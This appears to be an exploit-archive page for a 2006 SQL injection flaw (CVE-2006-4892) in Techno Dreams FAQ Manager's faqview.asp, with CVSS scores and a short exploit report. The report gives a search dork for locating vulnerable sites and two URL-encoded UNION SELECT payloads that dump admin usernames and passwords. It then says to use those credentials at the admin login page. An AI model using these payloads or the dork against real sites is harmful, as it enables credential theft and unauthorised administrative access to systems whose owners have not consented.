Techno Dreams FAQ Manager Package v1.0(faqview.asp) Remote SQL Injection Vulnerability

2006.09.22

Credit: ajann

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2006-4892

CWE: CWE-89

Dork: faqview.asp?key

CVSS Base Score: 7.5/10

Impact Subscore: 6.4/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

Vulnerability Report
************************************************************************
*******
# Title : Techno Dreams FAQ Manager Package v1.0(faqview.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Dork : faqview.asp?key
# Script Page : http://www.t-dreams.com
# Exploit;
************************************************************************
*******
###http://[target]/[path]/faqview.asp?key=[SQL HERE]
Example:
//faqview.asp?key=-1%20union%20select%200,0,username,password,0%20from%2
0admin
//faqview.asp?key=-1%20union%20select%200,0,0,username,password,0%20from
%20admin
With admin username and password take it,after join to login page: ../[path]/admin/
# ajann,Turkey
# ...
# Im not Hacker!

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Techno Dreams FAQ Manager Package v1.0(faqview.asp) Remote SQL Injection Vulnerability

Dork: faqview.asp?key

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.